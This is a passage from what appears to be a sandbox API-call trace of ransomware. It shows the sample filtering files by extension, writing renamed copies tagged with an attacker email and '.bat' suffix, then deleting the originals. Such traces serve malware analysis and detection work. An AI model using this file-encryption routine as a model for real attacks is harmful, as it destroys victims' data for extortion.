Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.603] lstrlenW (lpString=".1cd") returned 4 [0059.603] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.603] lstrlenW (lpString=".jpg") returned 4 [0059.603] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.603] lstrlenW (lpString=".doc") returned 4 [0059.603] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString=".docx") returned 5 [0059.603] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.603] lstrlenW (lpString=".pdf") returned 4 [0059.603] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString=".xls") returned 4 [0059.603] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString=".xlsx") returned 5 [0059.603] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.603] lstrlenW (lpString=".ppt") returned 4 [0059.603] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.603] lstrlenW (lpString=".zip") returned 4 [0059.603] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.603] lstrlenW (lpString=".rar") returned 4 [0059.603] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString=".bz2") returned 4 [0059.603] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.603] lstrlenW (lpString=".7z") returned 3 [0059.603] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.604] lstrlenW (lpString=".dbf") returned 4 [0059.604] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.604] lstrlenW (lpString=".1cd") returned 4 [0059.604] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0059.604] lstrlenW (lpString=".jpg") returned 4 [0059.604] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.604] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.604] lstrlenW (lpString="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 53 [0059.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.604] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.604] CloseHandle (hObject=0x358) returned 1 [0059.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.605] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.605] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.605] GetLastError () returned 0x0 [0059.605] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.674] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.675] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.675] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.675] SetEndOfFile (hFile=0x350) returned 1 [0059.675] CloseHandle (hObject=0x350) returned 1 [0059.692] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.692] SetEndOfFile (hFile=0x358) returned 1 [0059.693] CloseHandle (hObject=0x358) returned 1 [0059.693] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.694] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml")) returned 1 [0059.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.694] lstrlenW (lpString=".doc") returned 4 [0059.694] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString=".docx") returned 5 [0059.694] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.694] lstrlenW (lpString=".pdf") returned 4 [0059.694] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString=".xls") returned 4 [0059.694] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString=".xlsx") returned 5 [0059.694] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.694] lstrlenW (lpString=".ppt") returned 4 [0059.694] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.694] lstrlenW (lpString=".zip") returned 4 [0059.694] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.694] lstrlenW (lpString=".rar") returned 4 [0059.694] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString=".bz2") returned 4 [0059.694] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString=".7z") returned 3 [0059.694] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.694] lstrlenW (lpString=".dbf") returned 4 [0059.694] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.694] lstrlenW (lpString=".1cd") returned 4 [0059.695] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".jpg") returned 4 [0059.695] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".doc") returned 4 [0059.695] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString=".docx") returned 5 [0059.695] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.695] lstrlenW (lpString=".pdf") returned 4 [0059.695] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString=".xls") returned 4 [0059.695] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString=".xlsx") returned 5 [0059.695] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.695] lstrlenW (lpString=".ppt") returned 4 [0059.695] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".zip") returned 4 [0059.695] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.695] lstrlenW (lpString=".rar") returned 4 [0059.695] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString=".bz2") returned 4 [0059.695] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString=".7z") returned 3 [0059.695] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".dbf") returned 4 [0059.695] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".1cd") returned 4 [0059.695] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 104 [0059.695] lstrlenW (lpString=".jpg") returned 4 [0059.695] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.696] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.696] lstrlenW (lpString="AuthoredExtensions.xml") returned 22 [0059.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.696] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=373) returned 1 [0059.696] CloseHandle (hObject=0x358) returned 1 [0059.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 0x220 [0059.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.696] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.696] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.697] GetLastError () returned 0x0 [0059.697] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x175, lpOverlapped=0x0) returned 1 [0059.697] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x180, lpOverlapped=0x0) returned 1 [0059.698] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.698] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x100, lpOverlapped=0x0) returned 1 [0059.749] SetEndOfFile (hFile=0x350) returned 1 [0059.750] CloseHandle (hObject=0x350) returned 1 [0059.750] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.751] SetEndOfFile (hFile=0x358) returned 1 [0059.751] CloseHandle (hObject=0x358) returned 1 [0059.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 1 [0059.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.752] lstrlenW (lpString=".doc") returned 4 [0059.752] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString=".docx") returned 5 [0059.752] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0059.752] lstrlenW (lpString=".pdf") returned 4 [0059.752] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString=".xls") returned 4 [0059.752] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString=".xlsx") returned 5 [0059.752] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0059.752] lstrlenW (lpString=".ppt") returned 4 [0059.752] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.752] lstrlenW (lpString=".zip") returned 4 [0059.752] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.752] lstrlenW (lpString=".rar") returned 4 [0059.752] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString=".bz2") returned 4 [0059.752] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString=".7z") returned 3 [0059.752] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.752] lstrlenW (lpString=".dbf") returned 4 [0059.752] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".1cd") returned 4 [0059.753] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".jpg") returned 4 [0059.753] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".doc") returned 4 [0059.753] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString=".docx") returned 5 [0059.753] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0059.753] lstrlenW (lpString=".pdf") returned 4 [0059.753] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString=".xls") returned 4 [0059.753] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString=".xlsx") returned 5 [0059.753] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0059.753] lstrlenW (lpString=".ppt") returned 4 [0059.753] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".zip") returned 4 [0059.753] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.753] lstrlenW (lpString=".rar") returned 4 [0059.753] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString=".bz2") returned 4 [0059.753] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString=".7z") returned 3 [0059.753] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".dbf") returned 4 [0059.753] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.753] lstrlenW (lpString=".1cd") returned 4 [0059.754] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0059.754] lstrlenW (lpString=".jpg") returned 4 [0059.754] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.754] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0059.754] lstrlenW (lpString="AG00011_.GIF") returned 12 [0059.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.755] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=7216) returned 1 [0059.755] CloseHandle (hObject=0x358) returned 1 [0059.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 0x220 [0059.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.755] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.755] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.755] GetLastError () returned 0x0 [0059.755] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1c30, lpOverlapped=0x0) returned 1 [0060.121] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1c40, lpOverlapped=0x0) returned 1 [0060.122] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.122] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.122] SetEndOfFile (hFile=0x350) returned 1 [0060.123] CloseHandle (hObject=0x350) returned 1 [0060.124] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.124] SetEndOfFile (hFile=0x358) returned 1 [0060.125] CloseHandle (hObject=0x358) returned 1 [0060.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.125] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString=".doc") returned 4 [0060.126] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.126] lstrlenW (lpString=".docx") returned 5 [0060.126] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.126] lstrlenW (lpString=".pdf") returned 4 [0060.126] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.126] lstrlenW (lpString=".xls") returned 4 [0060.126] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.126] lstrlenW (lpString=".xlsx") returned 5 [0060.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.126] lstrlenW (lpString=".ppt") returned 4 [0060.126] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString=".zip") returned 4 [0060.126] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.126] lstrlenW (lpString=".rar") returned 4 [0060.126] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.126] lstrlenW (lpString=".bz2") returned 4 [0060.126] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.126] lstrlenW (lpString=".7z") returned 3 [0060.126] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString=".dbf") returned 4 [0060.126] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft 